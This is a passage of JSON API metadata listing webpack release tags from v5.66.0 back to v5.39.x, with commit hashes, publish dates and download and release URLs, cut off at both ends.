GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":